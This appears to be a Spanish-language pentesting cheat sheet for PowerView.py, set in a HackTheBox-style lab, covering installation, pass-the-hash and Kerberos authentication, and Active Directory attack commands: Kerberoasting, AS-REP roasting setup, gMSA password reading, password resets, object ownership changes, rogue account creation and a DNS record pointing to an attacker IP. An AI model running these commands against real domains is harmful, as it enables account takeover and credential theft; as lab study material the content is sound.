PowerView.py

Introduction

PowerView.py es una alternativa al fantástico script original PowerView.ps1. La mayoría de los módulos utilizados en PowerView están disponibles aquí (algunos de los indicadores han cambiado). El objetivo principal es lograr una sesión interactiva sin tener que autenticarse repetidamente en LDAP.

GitHub - aniqfakhrul/powerview.py: Just another Powerview alternative but on steroidsGitHub

Installation

sudo apt install libkrb5-dev
pip3 install powerview --break-system-packages

---

Use

Autenticación básica (User/Passworrd)

powerview dominio.htb/user:'password'@10.10.10.10 --dc-ip 10.10.10.10

Autenticación mediante Pass-the-Hash (PtH)

powerview dominio.htb/user@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10

Autenticación mediante Kerberos

powerview dominio.htb/user@dc.dominio.htb --dc-ip 10.10.10.10 -ns dc.dominio.htb -k --no-pass

---

Web Browser

powerview dominio.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000

---

Attacking AD using PowerView.py

# Añadir usuario a un grupo

Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'

# Asignar servicePrincipalName (SPN) a un usuario para Kerberoasting Attack (Necesario disponer permisos GenericAll/GenericWrite sobre el usuario $target)

Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'

# Deshabilitar ACCOUNTDISABLE para habilitar a un usuario deshabilitado

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'

# Habilitar DONT_REQ_PREAUTH para ASREP Roast (Necesario disponer permisos GenericAll/GenericWrite sobre el usuario $target)

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'

# Leer contraseña GMSA

Get-GMSA

# Kerberoasting Attack

Invoke-Kerberoast

# Modificar contraseña de un usuario

Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

# Convertir el usuario 'user_target' en propietario del objeto 'object_target'

Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'

# Añadir un nuevo Domain Computer

Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'

# Añadir un nuevo usuario del dominio

Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'

# Creamos un nuevo registro DNS, para posteriormente realizar ataques de DNS Spoofing.

Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>